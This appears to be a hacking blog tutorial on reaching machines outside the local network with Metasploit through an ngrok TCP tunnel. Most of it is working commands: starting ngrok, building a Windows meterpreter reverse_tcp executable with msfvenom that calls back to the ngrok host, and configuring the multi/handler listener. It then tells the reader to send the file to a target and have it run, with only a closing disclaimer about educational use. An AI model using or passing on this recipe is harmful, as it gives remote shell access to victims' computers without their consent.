Metasploit, packed with some of the most dangerous payloads and exploits, is of course a must-have tool for any hacker; there is no doubt about it. It is very easy to scan, create a payload, deliver it to the target and there you go... you got the shell!
What if you want to take it outside your own network? What if you need to test a remote server or a PC located outside the LAN? How can you exploit a machine using Metasploit without port forwarding?
ngrok is a service that lets you reach a device or service located inside a LAN from anywhere, without configuring port forwarding on the router: the ngrok agent makes an outbound connection to ngrok's servers, which expose a public hostname and port and tunnel the traffic back to your local port. You can SSH, use FTP or reach any local service this way.
In this post, we will use ngrok to create a Metasploit reverse TCP payload and establish a reverse TCP connection from the target machine (outside the LAN) to our attacking machine.
First, set up a free ngrok account. Follow steps 1, 2 and 3 of the guide below to set one up.
Once the registration is complete and the auth token has been added to your PC, start ngrok on a TCP port, say 9999, which is the port where Metasploit will listen for incoming reverse TCP connections:
./ngrok tcp 9999
If everything goes well, 'Session Status' will change to 'online' and something like this will be shown next to 'Forwarding':
Forwarding tcp://0.tcp.ngrok.io:19631 -> localhost:9999
What does that mean? It means that all traffic sent to 0.tcp.ngrok.io on port 19631 from anywhere on the internet will be redirected to port 9999 on the machine where this ngrok session is running. Leave it running. Note that on a free account the hostname and port are assigned when the tunnel starts and change every time ngrok is restarted, so the payload below has to be regenerated after a restart.
Now we create a payload using the ngrok hostname and port shown above as the payload's LHOST and LPORT (not the local port 9999: the target can only reach the public endpoint). Use the command below to create one:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19631 -f exe > payload.exe
Here I am using a Windows payload because my target machine outside the LAN is Windows.
The Metasploit payload has been created. Now, on our machine, we start the Metasploit listener with the commands below. The handler listens on the local port 9999 that ngrok forwards to, which is why its LPORT is different from the LPORT baked into the payload.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 9999
exploit
When you run 'exploit', it starts a listener on port 9999. Make sure the handler is running before the payload is executed on the target, since the payload has to find a listener behind the tunnel when it connects.
Now send the file to the target machine and run it there (for example by double-clicking it).
There you go... you got the shell!
Disclaimer: This is for educational purposes only. Any actions and/or activities related to the material contained within this website are solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges are brought against any individuals misusing the information in this website to break the law.